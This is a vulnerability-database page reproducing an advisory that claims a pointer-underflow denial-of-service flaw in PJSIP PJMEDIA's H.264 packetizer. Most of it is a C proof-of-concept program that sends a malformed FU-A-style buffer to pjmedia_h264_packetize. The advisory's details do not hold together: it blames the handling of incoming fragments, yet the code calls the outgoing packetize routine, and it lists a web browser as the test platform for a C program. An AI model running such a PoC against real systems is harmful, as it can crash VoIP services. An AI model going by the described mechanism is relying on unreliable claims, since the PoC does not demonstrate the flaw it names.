Vulners
Lucene search
📄 PJSIP PJMEDIA H.264 Denial of Service
=============================================================================================================================================
| # Title : PJSIP PJMEDIA H.264 Improper FU-A State Validation in Packetizer May Lead to Pointer Underflow (DoS) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h |
=============================================================================================================================================
[+] Summary : A logical validation flaw was identified in the H.264 packetization routine within the PJMEDIA component of PJSIP.
Specifically, insufficient validation of FU-A (Fragmentation Unit – Type A) state handling in pjmedia_h264_packetize() may allow malformed RTP payloads to trigger unsafe pointer arithmetic.
When a crafted FU-A fragment is processed with the Start bit (S) unset and without a valid preceding fragmentation context, the packetizer may compute offsets relative to an assumed NAL start position.
In affected versions, improper boundary checks during this calculation can result in pointer underflow, causing out-of-bounds memory access.
Under typical modern memory protections (ASLR/DEP), successful exploitation is most likely limited to Denial of Service via application crash.
However, depending on heap layout and runtime conditions, unintended memory reads may occur.
[+] POC :
#include <pjlib.h>
#include <pjmedia/h264_packetizer.h>
#include <stdio.h>
#define MTU_SIZE 1400
#define PAYLOAD_SIZE 200
int main() {
pj_caching_pool cp;
pj_pool_t *pool;
pjmedia_h264_packetizer *pktz;
pjmedia_h264_packetizer_cfg cfg;
pj_status_t status;
pj_init();
pj_caching_pool_init(&cp, NULL, 1024*1024);
pool = pj_pool_create(&cp.factory, "ExploitPool", 4096, 4096, NULL);
pjmedia_h264_packetizer_cfg_default(&cfg);
cfg.mtu = MTU_SIZE;
cfg.mode = PJMEDIA_H264_PACKETIZER_MODE_NON_INTERLEAVED;
pjmedia_h264_packetizer_create(pool, &cfg, &pktz);
pj_uint8_t malformed_h264[PAYLOAD_SIZE];
pj_bzero(malformed_h264, PAYLOAD_SIZE);
malformed_h264[0] = 0x7C;
malformed_h264[1] = 0x05;
unsigned pos = 0;
const pj_uint8_t *out_pkt[16];
pj_size_t out_pkt_len[16];
printf("[*] Starting Packetization - Target: Pointer Underflow\n");
pjmedia_h264_packetize(pktz,
malformed_h264,
PAYLOAD_SIZE,
&pos,
out_pkt,
out_pkt_len);
printf("[+] Process finished. If no crash, the system might be protected.\n");
pj_pool_release(pool);
pj_caching_pool_destroy(&cp);
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5